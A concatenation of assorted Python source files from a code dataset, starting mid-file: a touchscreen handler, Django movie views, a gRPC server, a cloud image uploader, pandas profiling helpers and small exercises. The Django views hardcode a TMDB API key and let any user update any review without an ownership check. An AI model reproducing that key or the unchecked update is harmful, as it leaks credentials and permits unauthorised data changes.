None:\n\t\t\t\t\t\tself._current_touch.x = self.position.x\n\t\t\t\t\t\tself._current_touch.y = self.position.y\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._current_touch.x = (self.a[2] + self.a[0] * self.position.x + self.a[\n\t\t\t\t\t\t\t1] * self.position.y) / self.a[6]\n\t\t\t\t\t\tself._current_touch.y = (self.a[5] + self.a[3] * self.position.x + self.a[\n\t\t\t\t\t\t\t4] * self.position.y) / self.a[6]\n\t\t\t\t\tif event.value == 
1:\n\t\t\t\t\t\tself._current_touch.events.append(TS_PRESS)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._current_touch.events.append(TS_RELEASE)\n\n\t\t\tif event.type == EV_ABS: # Absolute cursor position\n\t\t\t\tif event.code == ABS_MT_SLOT:\n\t\t\t\t\tself._touch_slot = event.value\n\n\t\t\t\tif event.code == ABS_MT_TRACKING_ID:\n\t\t\t\t\tself._current_touch.id = event.value\n\n\t\t\t\tif event.code == ABS_MT_POSITION_X:\n\t\t\t\t\ttmp = event.value + self._shiftx\n\t\t\t\t\tif self._flipx != 0:\n\t\t\t\t\t\ttmp = self._flipx - event.value\n\t\t\t\t\tif tmp < 0:\n\t\t\t\t\t\tprint('Negative touch position(x): {}'.format(tmp))\n\t\t\t\t\t\ttmp = 0\n\t\t\t\t\tself._current_touch.x = round(tmp * self._scalex)\n\n\t\t\t\tif event.code == ABS_MT_POSITION_Y:\n\t\t\t\t\ttmp = event.value + self._shifty\n\t\t\t\t\tif self._flipy != 0:\n\t\t\t\t\t\ttmp = self._flipy - event.value\n\t\t\t\t\tif tmp < 0:\n\t\t\t\t\t\tprint('Negative touch position(y): {}'.format(tmp))\n\t\t\t\t\t\ttmp = 0\n\t\t\t\t\tself._current_touch.y = round(tmp * self._scaley)\n\n\t\t\t\tif event.code == ABS_X:\n\t\t\t\t\tself.position.x = event.value\n\n\t\t\t\tif event.code == ABS_Y:\n\t\t\t\t\tself.position.y = event.value\n\n\t\treturn []\n\n\tdef _touch_device(self):\n\t\t# return '/dev/input/touchscreen'\n\t\tfor evdev in glob.glob(\"/sys/class/input/event*\"):\n\t\t\ttry:\n\t\t\t\twith io.open(os.path.join(evdev, 'device', 'name'), 'r') as f:\n\t\t\t\t\tdev = f.read().strip()\n\t\t\t\t\tif dev in self.touchdefs:\n\t\t\t\t\t\tself.controller = dev\n\t\t\t\t\t\tvals = self.touchdefs[dev]\n\t\t\t\t\t\tself._shiftx = int(vals[1])\n\t\t\t\t\t\tself._shifty = int(vals[2])\n\t\t\t\t\t\tself._flipx = int(vals[3])\n\t\t\t\t\t\tself._flipy = int(vals[4])\n\t\t\t\t\t\tself._scalex = float(vals[5])\n\t\t\t\t\t\tself._scaley = float(vals[6])\n\t\t\t\t\t\tself._capscreen = bool(vals[0])\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\t'''\n\t\t\t\t\tif dev in self.TOUCHSCREEN_EVDEV_NAME:\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\telif dev == self.TOUCHSCREEN_RESISTIVE:\n\t\t\t\t\t\tself._capscreen = False\n\t\t\t\t\t\twith open('/etc/pointercal', 'r') as pc:\n\t\t\t\t\t\t\tself.a = list(int(x) for x in next(pc).split())\n\t\t\t\t\t\t# set to do corrections? 
TODO read pointercal and set a flag to correct\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\telif dev == self.TOUCHSCREEN28CAP:\n\t\t\t\t\t\tself._flipx = 0 # 240 todo auto fix orientation?\n\t\t\t\t\t\tself._flipy = 0 # 320\n\t\t\t\t\t\treturn os.path.join('/dev', 'input', os.path.basename(evdev))\n\t\t\t\t\t'''\n\t\t\texcept IOError as e:\n\t\t\t\tif e.errno != errno.ENOENT:\n\t\t\t\t\traise\n\t\traise RuntimeError('Unable to locate touchscreen device')\n\n\tdef read(self):\n\t\treturn next(iter(self))\n\n\nif __name__ == \"__main__\":\n\timport signal\n\n\tpygame.init()\n\tpygame.fastevent.init()\n\tminx = 1000000\n\tmaxx = -1000000\n\tminy = 1000000\n\tmaxy = -1000000\n\ta = [5724, -6, -1330074, 26, 8427, -1034528, 65536]\n\tb = [34, 952, 38, 943]\n\n\tts = Touchscreen()\n\n\tprint('Test touch points:')\n\n\n\tdef handle_event(event, tch):\n\t\tglobal minx, miny, maxx, maxy\n\t\t# xx = (a[2] + a[0] * touch.x + a[1] * touch.y) / a[6]\n\t\t# yy = (a[5] + a[3] * touch.x + a[4] * touch.y) / a[6]\n\t\t# Xx = (touch.x - b[0]) * 320 / (b[1] - b[0])\n\t\t# Xy = (touch.y - b[2]) * 480 / (b[3] - b[2])\n\t\tprint([\"Release\", \"Press\", \"Move\"][event],\n\t\t\t tch.slot,\n\t\t\t tch.x,\n\t\t\t tch.y)\n\t\tminx = min(minx, tch.x)\n\t\tminy = min(miny, tch.y)\n\t\tmaxx = max(maxx, tch.x)\n\t\tmaxy = max(maxy, tch.y)\n\t\treturn\n\t\t# noinspection PyUnreachableCode\n\t\tif event == 1:\n\t\t\te = pygame.event.Event(pygame.MOUSEBUTTONDOWN, {'pos': (tch.x, tch.y)})\n\t\t\tpygame.fastevent.post(e)\n\t\telif event == 0:\n\t\t\te = pygame.event.Event(pygame.MOUSEBUTTONUP, {'pos': (tch.x, tch.y)})\n\t\t\tpygame.fastevent.post(e)\n\n\n\tfor touch in ts.touches:\n\t\ttouch.on_press = handle_event\n\t\ttouch.on_release = handle_event\n\t\ttouch.on_move = handle_event\n\n\ttry:\n\t\tts.run()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Stopping thread...\")\n\t\tprint('MinX: {} MaxX: {} MinY: {} MaxY: {}'.format(minx, maxx, miny, maxy))\n\t\texit()\n","sub_path":"deprecated/test2touchhandler.py","file_name":"test2touchhandler.py","file_ext":"py","file_size_in_byte":9201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"520234239","text":"import numpy as np\nimport scipy.io\nfrom typing import Iterable, Tuple\n\n\nclass MatlabWeightsParser(object):\n \"\"\"\n Class for handling matconvnet weights.\n \"\"\"\n def __init__(self, weights_path: str, layer_names: Iterable[str]):\n \"\"\"\n :param weights_path: path to matconvnet file.\n :param layer_names: names of convnet for which weight are loading.\n \"\"\"\n\n self._data = scipy.io.loadmat(weights_path)['layers'][0]\n\n self._weights = {\n layer: MatlabWeightsParser.get_conv_layer_weights(self._data[index])\n for index, layer in enumerate(layer_names)\n if layer.startswith('conv')\n }\n\n def get_layer_weights(self, layer_name: str) -> np.ndarray:\n \"\"\"\n Gets weights for layer by name.\n :param layer_name: layer name for which need load weights.\n :return: layer weights.\n \"\"\"\n\n if layer_name not in self._weights:\n raise KeyError('Invalid layer name {}.'.format(\n layer_name\n ))\n\n return self._weights[layer_name]\n\n @staticmethod\n def get_conv_layer_weights(layer_weights: np.ndarray) -> Tuple[np.ndarray]:\n \"\"\"\n Loads convolution weights for matconvnet format into TensorFlow format.\n :param layer_weights: matconvnet weights.\n :return: TensorFlow weights.\n \"\"\"\n\n kernel_weights = layer_weights[0][0][2][0][0]\n\n # matconvnet: layer_weights 
are\n        # [width, height, in_channels, out_channels]\n\n        # tensorflow: layer_weights are\n        # [height, width, in_channels, out_channels]\n\n        kernel_weights = np.transpose(kernel_weights, (1, 0, 2, 3))\n\n        bias_weights = np.array(layer_weights[0][0][2][0][1])\n        bias_weights = bias_weights.reshape(-1)\n\n        return kernel_weights, bias_weights\n","sub_path":"utils/matlab_weight_loader.py","file_name":"matlab_weight_loader.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107900199","text":"from django.shortcuts import render,redirect,get_object_or_404\nfrom .models import Movie, Genre, Review, People\nfrom .forms import ReviewForm\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseForbidden,HttpResponse,JsonResponse\nimport requests\nfrom django.core import serializers\nimport pprint\nfrom django.db.models import Avg, Max, Min, Sum\nfrom django.contrib.auth import get_user_model\nimport json\nfrom django.contrib import messages\n\n# Create your views here.\ndef start(request):\n    return render(request,'movies/start.html')\n\ndef index(request, page_type):\n    movies = Movie.objects.all()\n    index_movies = Movie.objects.filter(movie_type=\"now_playing\").order_by('-popularity')[:10]\n    # user_rated_movies = Movie.objects.order_by(\"-avgscore\")[:10]\n    print(index_movies)\n    if page_type == 1:\n        top_rated_movies = Movie.objects.filter(movie_type=\"top_rated\").order_by('-popularity')[:10]\n        context = {\n            'movies': top_rated_movies,\n        }\n    elif page_type == 2:\n        popul_movies = Movie.objects.filter(movie_type=\"popular\").order_by('-popularity')[:10]\n        context = {\n            'movies': popul_movies,\n        }\n    # elif page_type == 3:\n    #     if request.user.is_authenticated:\n    #         for movie in request.user.like_movies.all():\n    #             url = f'https://api.themoviedb.org/3/movie/{movie.id}/recommendations?api_key=1dfd52c8a24a0f38f40efe41c86be13b&language=ko-KR&page=1'\n    #             response = requests.get(url).json()\n    #             pprint.pprint(response[\"results\"])\n    #             movies = response[\"results\"]\n    #         pprint.pprint(movies)\n    #         context = {\n    #             'movies': movies\n    #         }\n    #     else:\n    #         context = {\n    #             'movies': index_movies\n    #         }\n    else:\n        context = {\n            'movies': index_movies\n        }\n    return render(request,'movies/index.html',context)\n\ndef detail(request,movie_pk):\n    movie = get_object_or_404(Movie,pk=movie_pk)\n    reviewform = ReviewForm()\n    avg_score = 0\n    reviews = Review.objects.filter(movie_id=movie_pk)\n\n    url = f'https://api.themoviedb.org/3/movie/{movie_pk}/recommendations?api_key=1dfd52c8a24a0f38f40efe41c86be13b&language=ko-KR&page=1'\n    response = requests.get(url).json()\n    pprint.pprint(response[\"results\"])\n    new_movies = response[\"results\"]\n    # print(reviews.avgscore)\n    # print(reviews.filter(movie_id=movie_pk).aggregate(Avg('score')))\n    for review in reviews:\n        avg_score += review.score\n    if reviews.count() > 0:\n        avg_score /= reviews.count()\n        avg_score = round(avg_score, 1)\n    else:\n        avg_score = 0\n    peoples = []\n    casts = movie.cast.all()\n    for cast in casts:\n        people = People.objects.filter(id=cast.id).first()\n        if people:\n            peoples.append(people)\n    context = {\n        'movie' : movie,\n        'new_movies': new_movies,\n        'form' : reviewform,\n        'avg_score': avg_score,\n        'peoples': peoples\n    }\n    return render(request,'movies/detail.html', context)\n\n@login_required\ndef review(request, movie_pk):\n    reviews = Review.objects.filter(movie_id=movie_pk)\n    movie = 
get_object_or_404(Movie,pk=movie_pk)\n    reviewForm = ReviewForm(request.POST)\n    if reviewForm.is_valid():\n        review = reviewForm.save(commit=False)\n        review.movie_id = movie_pk\n        review.user = request.user\n        # movie.avgscore = reviews.aggregate(Avg('score'))\n        # print(movie.avgscore)\n        review.save()\n        return redirect('movies:detail', movie_pk)\n    context = {\n        'movie' : movie,\n        'form' : reviewForm\n    }\n    return render(request,'movies/detail.html', context)\n\n@require_POST\ndef review_delete(request, movie_pk, review_pk):\n    review = Review.objects.get(pk=review_pk)\n    if request.user == review.user:\n        review.delete()\n        messages.success(request, '댓글이 삭제되었습니다.')\n        return redirect('movies:detail', movie_pk)\n    else:\n        return HttpResponseForbidden()\n\ndef review_update(request, movie_pk, review_pk):\n    review = get_object_or_404(Review, pk=review_pk)\n    review.content = request.POST.get('content') or review.content or ''\n    review.score = request.POST.get('score') or review.score\n    review.save()\n    return redirect('movies:detail',movie_pk)\n\n@login_required\ndef like(request, movie_pk):\n    if request.is_ajax():\n        movie = get_object_or_404(Movie, pk=movie_pk)\n        is_liked = True\n        if request.user in movie.like_users.all():\n            movie.like_users.remove(request.user)\n            is_liked = False\n        else:\n            movie.like_users.add(request.user)\n            is_liked = True\n        context = {\n            'is_liked' : is_liked,\n            'like_count' : movie.like_users.count()\n        }\n        return JsonResponse(context)\n    else:\n        return HttpResponseForbidden()\n\n\ndef recommand(request):\n    movies = Movie.objects.all()\n    context = {\n        'movies' : movies\n    }\n    return render(request,'movies/recommand.html',context)\n\ndef search(request):\n    query = request.GET.get('search_title')\n    if query:\n        title_movies = Movie.objects.filter(title__icontains=query)\n        description_movies = Movie.objects.filter(description__icontains=query)\n        des_movies = description_movies.difference(title_movies)\n        context = {\n            \"title_movies\" : title_movies,\n            \"des_movies\" : des_movies\n        }\n        return render(request,'movies/search.html',context)\n    else:\n        return redirect('movies:index', 0)\n","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"570593505","text":"import json\n\nclass config:\n\n    def __init__(self):\n        with open(\"config.json\") as json_file:\n            data = json.load(json_file)\n            self.listen_ip = data[\"listen_ip\"]\n            self.listen_port = data[\"listen_port\"]\n            self.apikey = data[\"apikey\"]\n            self.redis_task_ttl = data[\"redis_task_ttl\"]\n            self.redis_server = data[\"redis_server\"]\n            self.redis_port = data[\"redis_port\"]\n            self.redis_core_q = data[\"redis_core_q\"]\n            self.redis_task_timeout = data[\"redis_task_timeout\"]\n            self.txtfsm_index_file = data[\"txtfsm_index_file\"]\n            self.txtfsm_template_server = data[\"txtfsm_template_server\"]\n","sub_path":"backend/core/confload/confload.py","file_name":"confload.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305805329","text":"def intersection(arrays):\n    \"\"\"\n    Return the values that appear in every one of the input lists.\n    \"\"\"\n    # initializing a dict to hold the key value pairs\n    dict = {}\n    # there can be up to 10 lists in arrays\n    number_of_lists = len(arrays)\n    for each_list in arrays: # for each of the lists from our input (arrays)\n        for each_item in each_list: # for each item of each list\n            if each_item in dict: # if the item is already 
in the dictionary\n dict[each_item] += 1 # increase the key count\n else:\n dict[each_item] = 1 # add key count of 1 to dict if it isn't already there\n\n intersections = []\n # we have created a count of how many lists each item exists within\n for key in dict:\n # if it exists in all of them it would be equal to our \"number_of_lists\"\n if dict[key] == number_of_lists:\n # add the values that intersect to our intersection array\n intersections.append(key)\n\n return intersections\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000, 2000000)) + [1, 2, 3])\n arrays.append(list(range(2000000, 3000000)) + [1, 2, 3])\n arrays.append(list(range(3000000, 4000000)) + [1, 2, 3])\n\n print(intersection(arrays))\n ","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"47536688","text":"#!/home/odroid/prefix/default/lib python2\n'''\nCreated on Jan 19, 2018\n\n@author: enzo\n'''\nfrom src import *\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.mplot3d.axes3d as axes3d\n \ndef main():\n # Init all parts of application\n try:\n endEvent = threading.Event()\n processEvent = threading.Event()\n processEvent.clear()\n fig = plt.figure(1) # Plot figure\n ax1 = fig.gca() # Plot data\n #ax1 = fig.add_subplot(111)\n data = Data() # The data class that contains all data\n dspProcces = dsp(data,endEvent,processEvent) # The signalproccesing block\n #time.sleep(5)\n app = Application(dspProcces,data,ax1,fig,endEvent) # Terminal application\n plotevent = app.getPlotEvent()\n \n while endEvent.isSet() == False:\n time.sleep(1)\n if plotevent.isSet():\n plotevent.clear()\n plt.show()\n \n\n except (KeyboardInterrupt,SystemExit):\n app.endprocess()\nif __name__ == '__main__':\n gpsp.start() # Global gps object start\n main()\n","sub_path":"AntChar_backup_180515/Antchar/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623728686","text":"# Copyright 2015 gRPC authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"The Python implementation of the GRPC helloworld.Greeter server.\"\"\"\n\nfrom concurrent import futures\n\nimport grpc\n\nimport helloworld_pb2\nimport helloworld_pb2_grpc\n\nfrom datetime import datetime\n\nREPLY=\"done_1\"\nPORT=4444\n\nclass Greeter(helloworld_pb2_grpc.GreeterServicer):\n def SayHello(self, request, context):\n msg=request.name\n print(\"request from the client with the message: %s\" % msg)\n if (msg==\"time\"):\n return helloworld_pb2.HelloReply(message='%s' % time())\n else:\n return helloworld_pb2.HelloReply(message='%s' % refuse())\n def SayHelloAgain(self, request_iterator, context):\n for request in request_iterator:\n print(\"streaming: request from the client with the message %s\" % request.name)\n response=helloworld_pb2.HelloReply(message='streaming: %s! 
' % REPLY)\n return response\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))\n helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)\n server.add_insecure_port('[::]:4444')\n print(\"Server 1 is listening on port 4444 ...\")\n server.start()\n server.wait_for_termination()\n\ndef time():\n now=datetime.now()\n return now.strftime(\"%H:%M:%S\")\n\ndef refuse():\n return \"time was not requested\"\n\nif __name__ == '__main__':\n serve()\n","sub_path":"grpc/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"493347100","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nfrom _actions_ import LActions\nfrom _debug_ import *\nfrom setup import * \n\nimport qrc_resources\n\nif not vars().has_key('ACTIONS'): ACTIONS = 0\n\n#----------------------------------------------------------------------\nclass LMyActions(LActions):\n\n def __init__(self, dataContainer=None, parent=None):\n super(LMyActions, self).__init__(dataContainer, parent)\n self.dataContainer = dataContainer \n self.createActions()\n self.createMenus()\n\n def createActions(self): \n super(LMyActions, self).createActions()\n self.insertARowAction = self.createAction(\"&Insert New Condition\", self.on_insertARowAction_triggered)\n self.removeARowAction = self.createAction(\"&Remove Current Condition\", self.on_removeARowAction_triggered)\n\n def createMenus(self):\n super(LMyActions, self).createMenus()\n self.contextMenuActions = [ self.insertARowAction, self.removeARowAction, ] + self.contextMenuActions\n self.contextMenu = self.getContextMenu(\"Condition Table\")\n\n #----------------------------------------------------------------------\n # Signals/Slots\n\n def on_insertARowAction_triggered(self):\n ''' Insert row '''\n numberOfRows = self.parent().tableModel.rowCount(self)\n self.parent().tableModel.insertRow(numberOfRows)\n\n def on_removeARowAction_triggered(self):\n ''' Remove row '''\n index =self.parent().tableView.currentIndex()\n row = index.row()\n self.parent().tableModel.removeRow(row)\n\n#----------------------------------------------------------------------\n# MAIN\n#----------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n pass\n \n","sub_path":"cls1/eggs/src/lti/widgets.20120401/conditiontable/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"99580908","text":"\r\nitems = input().split('|')\r\n\r\nbudget = float(input())\r\n\r\nsum_new_prices = 0\r\nnew_budget = 0\r\nsum_old_prices = 0\r\ntotal_profit = 0\r\nbought_products_list = []\r\n\r\nfor i in items:\r\n tokens = i.split('->')\r\n cloth_type = tokens[0]\r\n price = float(tokens[1])\r\n\r\n if cloth_type == 'Clothes' and price <= 50:\r\n if budget >= price:\r\n budget -= price\r\n sum_old_prices += price\r\n price = price * 1.40\r\n sum_new_prices += price\r\n bought_products_list.append(price)\r\n\r\n if cloth_type == 'Shoes' and price <= 35:\r\n if budget >= price:\r\n budget -= price\r\n sum_old_prices += price\r\n price = price * 1.40\r\n sum_new_prices += price\r\n bought_products_list.append(price)\r\n\r\n if cloth_type == 'Accessories' and price <= 20.50:\r\n if budget >= price:\r\n budget -= price\r\n sum_old_prices += price\r\n price = price * 1.40\r\n sum_new_prices += price\r\n 
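# keep the marked-up price so the receipt below can print each purchase\r\n            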
bought_products_list.append(price)\r\n\r\ntotal_profit = sum_new_prices - sum_old_prices\r\nnew_budget = budget + sum_new_prices\r\n\r\n\r\nfor item in bought_products_list:\r\n print(f'{item:.2f}', end=' ')\r\nprint()\r\nprint(f'Profit: {total_profit:.2f}')\r\n\r\nif new_budget >= 150:\r\n print('Hello, France!')\r\nelse:\r\n print('Time to go.')\r\n","sub_path":"Python Fundamentals 2020 - 2021/03 - LISTS BASIC/Exercise - 04 - 09.py","file_name":"Exercise - 04 - 09.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"232053656","text":"# -*- coding: utf8 -*-\n# @author: yinan\n# @time: 18-7-17 下午9:38\n# @filename: util.py\nimport base64\n\nimport os\n\nfrom application import app\nimport time\nimport re\nfrom io import BytesIO\n\nfrom PIL import Image\nfrom qcloud_cos import CosConfig, CosS3Client\n\nfrom application import configs\n\n\nclass CommonUtil(object):\n @staticmethod\n def handle_img(base64_str, filename):\n image_path = configs.SYS_UPLOAD_PATH + filename\n base64_data = re.sub('^data:image/.+;base64,', '', base64_str)\n byte_data = base64.b64decode(base64_data)\n image_data = BytesIO(byte_data)\n img = Image.open(image_data)\n if image_path:\n img.convert(\"RGB\").save(image_path, 'WEBP')\n return img\n\n @staticmethod\n def upload_img(filename):\n tencent_config = configs.TENCENT_OAUTH\n image_path = configs.SYS_UPLOAD_PATH + filename\n config = CosConfig(Region=tencent_config.get('region'), Secret_id=tencent_config.get('secret_id'),\n Secret_key=tencent_config.get('secret_key')) # 获取配置对象\n client = CosS3Client(config)\n remote_name = str(int(time.time())) + '.webp'\n remote_url = 'http://{}.cosgz.myqcloud.com/{}'.format(tencent_config.get('bucket'), remote_name)\n response = None\n try:\n with open(image_path, 'rb') as fp:\n response = client.put_object(\n Bucket=tencent_config.get('bucket'),\n Body=fp.read(),\n Key=remote_name\n )\n os.remove(image_path)\n except Exception as e:\n app.logger.error('upload file to tencent error: {}'.format(e))\n if response is not None and response['ETag'] is not None:\n return remote_url\n else:\n return None\n","sub_path":"application/constant/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"399944320","text":"\n\"\"\"\nCreated on Thu Jan 10 3:08:09 2019\n@author: Deloitte Consutling, LLP\n@credits: [Donnally, Ryan rdonnally@deloitte.com,\n Michael Martin michmartin@deloitte.com,\n Whitehead, Noah nowhitehead@deloitte.com,\n Miller, Taylor taymiller@deloitte.com,\n Houdeshell, Benjamin bhoudeshell@deloitte.com,\n Han, Bryan bryhan@deloitte.com,\n Jackson, Amina amijackson@deloitte.com,\n Li, Yingquan yingquli@deloitte.com,\n Barry, Ande elbarry@deloitte.com,\n Grubb, Christopher cgrubb@deloitte.com,\n Stevens, Isaac isstevens@deloitte.com,\n Barsness, Brendan bbarsness@deloitte.com,\n Haddad, Abigail abhaddad@deloitte.com,\n Maroon, Christopher cmaroon@deloitte.com]\n@version: 0.0.1\n@maintainer: Ryan Donnally rdonnally@deloitte.com\n@compatability: Python 3.7, Pandas 0.23.4\n\n\"\"\"\n\nimport pandas as pd\n\n\n###########################################################################\n### Numeric correlations function that returns the top n column correlations\n\ndef get_correlation(df):\n # correlation_table=df.corr(method='kendall')\n z = df.corr().abs() # gets absolute values of a correlation table\n s = 
z.unstack() # unstacks the data into a single row\n    corr_sort = s.sort_values(ascending=False, kind=\"quicksort\") # sorts the values from high to low\n    new_corr_sort = (corr_sort[corr_sort != 1]).head(10) # drops the values that are 1 to 1; shows top 10 values\n    return new_corr_sort\n\n\n### Show the Sample Data\ndef get_sample_of_cols(df):\n    if len(df.columns) < 6:\n        X = df.head()\n    else:\n        X = df.head().iloc[:, :5]\n    return X\n\n\ndef get_fields_and_types(df):\n    \"\"\"Returns a dictionary of dataframe columns and dtypes as strings\n\n    :param df:\n    :return:\n    \"\"\"\n    return {column: str(dtype) for column, dtype in df.dtypes.items()}\n\n\ndef get_variable_type_counts(df):\n    \"\"\"returns a dict of type: type_count key: value pairs\"\"\"\n    count = df.dtypes.value_counts()\n    type_count_dict = {}\n    for i in count.index:\n        type_count_dict[str(i)] = count[i]\n\n    return type_count_dict\n\ndef get_type_counts_with_numeric(df):\n    \"\"\"Returns a dict of types and type counts and includes a\n    numeric type that is the sum of counts of float columns and int columns\n\n    :param df:\n    :return:\n    \"\"\"\n    type_count_dict = get_variable_type_counts(df)\n\n    _numeric = []\n    for key in type_count_dict.keys():\n        if 'float' in key or 'int' in key:\n            _numeric.append(type_count_dict[key])\n\n    _total_numeric = sum(_numeric)\n\n    type_count_dict['numeric'] = _total_numeric\n\n    return type_count_dict\n\n###########################################################################\n###\ndef get_data_summary(df):\n    dataset_vars = {\n        'column_names': list(df.columns),\n        'col_type_dict': dict(df.dtypes),\n        \"count_rows\": len(df.index),\n        \"count_columns\": len(df.columns),\n        \"count_missing_values\": df.isnull().sum().sum(),  # sum over rows, then over columns,\n        \"memoryusage_df\": df.memory_usage(index=False, deep=True).sum(),\n        \"memoryusage_avg_col\": df.memory_usage(index=False, deep=True).sum()/len(df.columns),\n        # \"Correlation Matrix\": self.get_correlation(df),\n\n        # Why do we want to report this\n        \"count_unique_values\": df.nunique().sum(),\n        \"count_unique_vals_per_col\": df.nunique(axis=0),\n        \"percent_unique_values\": df.nunique().sum() / (len(df.index) * len(df.columns)),\n        \"percent_unique_per_col\": df.nunique(axis=0) / len(df.index),\n        # \"Sample of the Data\": self.get_SampleOfData(df),\n        # \"Column Names\": self.get_header_names(df),\n        \"count_variable_type\": get_variable_type_counts(df),\n        \"percent_missing_values\": df.isnull().sum().sum() / (len(df.index) * len(df.columns))\n    }\n    return dataset_vars\n\n\n\n\n###########################################################################\n### Function to convert dates into their date decimal values.\n\ndef conversion_to_decimal(date):\n    return (float(date.strftime(\"%j\")) - 1) / 366 + float(date.strftime(\"%Y\"))\n\n###########################################################################\n### Function to convert date decimals to their datetime equivalents.\n\ndef conversion_to_date(date):\n    # local import keeps the function self-contained; the module header only imports pandas\n    from datetime import datetime, timedelta\n\n    year = int(date)\n    rem = date - year\n\n    base = datetime(year, 1, 1)\n    return base + timedelta(seconds=(base.replace(year=base.year + 1) - base).total_seconds() * rem)\n\n
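###########################################################################\n### Example round-trip for the two converters above (illustrative values;\n### conversion_to_decimal uses a fixed 366-day year, so results are approximate):\n###     from datetime import datetime\n###     conversion_to_decimal(datetime(2020, 7, 1))   # -> ~2020.4973\n###     conversion_to_date(2020.4973)                 # -> ~2020-07-01 00:00\n\n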
def get_outlier_info(pandas_series,\n                     low_quantile = 0.25,\n                     high_quantile = 0.75,\n                     iqr_scale = 1.5):\n    quartile_1 = pandas_series.quantile(low_quantile)\n    quartile_3 = pandas_series.quantile(high_quantile)\n    iqr = quartile_3 - quartile_1\n    lower_bound = quartile_1 - (iqr * iqr_scale)\n    upper_bound = quartile_3 + (iqr * iqr_scale)\n\n    high_count = pandas_series[pandas_series > upper_bound].count()\n    low_count = pandas_series[pandas_series < lower_bound].count()\n\n    outlier_dict = {'High Cutoff': upper_bound,\n                    'Low Cutoff': lower_bound,\n                    'High Count': high_count,\n                    'Low Count': low_count}\n\n    return outlier_dict\n\n\n\n# @TODO: add imputation methods e.g. mean, Gaussian sample, regression, etc.\n# @TODO: sort out why there should be separate outlier calculations for different dtypes\ndef outlier_detection(pd_column, impute=True, impute_type = 'mode'):\n    \"\"\"\n\n    :param pd_column: column from a pandas dataframe\n    :param impute: (bool) default = True, whether missing data will be imputed\n    :param impute_type: imputation strategy; only 'mode' is implemented\n    :return: dict of outlier cutoffs and counts for numeric columns, otherwise None\n    \"\"\"\n    if 'int' in str(pd_column.dtype) or 'float' in str(pd_column.dtype):\n        if impute and impute_type == 'mode':\n            pd_column.fillna(pd_column.mode()[0], inplace=True)\n        outlier_dict = get_outlier_info(pd_column)\n        return outlier_dict\n\n    # non-numeric columns are not analysed for outliers\n    return None\n\n# Support Functions for Datetime\n\n###########################################################################\n### This function is called by datetime_stats - it finds the largest value (year,month,day etc) that changes over the field.\n### Inputs are the min/max from a datetime field, output is a string specifying the largest value that changes\n\ndef largest_value_change(value_min, value_max):\n    ValueRange = value_max - value_min\n    if ValueRange.days > 365:\n        LargeValue = 'Years'\n    elif ValueRange.days > 31:\n        LargeValue = 'Months'\n    elif ValueRange.days > 0:\n        LargeValue = 'Days'\n    elif ValueRange.seconds > 3600:\n        LargeValue = 'Hours'\n    elif ValueRange.seconds > 60:\n        LargeValue = 'Minutes'\n    elif ValueRange.seconds > 0:\n        LargeValue = 'Seconds'\n    else:\n        LargeValue = 'Less Than 1 Second'\n    return LargeValue\n\n###########################################################################\n### Creates a dict with a frequency distribution of dates by month\n\ndef month_count_dict_create(Field):\n    MonthCountDict = {'Jan': 0, 'Feb': 0, 'Mar': 0, 'Apr': 0, 'May': 0, 'Jun': 0, 'Jul': 0, 'Aug': 0, 'Sep': 0,\n                      'Oct': 0, 'Nov': 0, 'Dec': 0}\n    RefDict = {1: 'Jan', 2: 'Feb', 3: 'Mar', 4: 'Apr', 5: 'May', 6: 'Jun', 7: 'Jul', 8: 'Aug', 9: 'Sep', 10: 'Oct',\n               11: 'Nov', 12: 'Dec'}\n    MonthCountDictPrelim = Field.dt.month.value_counts()\n    for key in MonthCountDictPrelim.index:\n        MonthCountDict[RefDict[key]] = MonthCountDictPrelim[key]\n    return 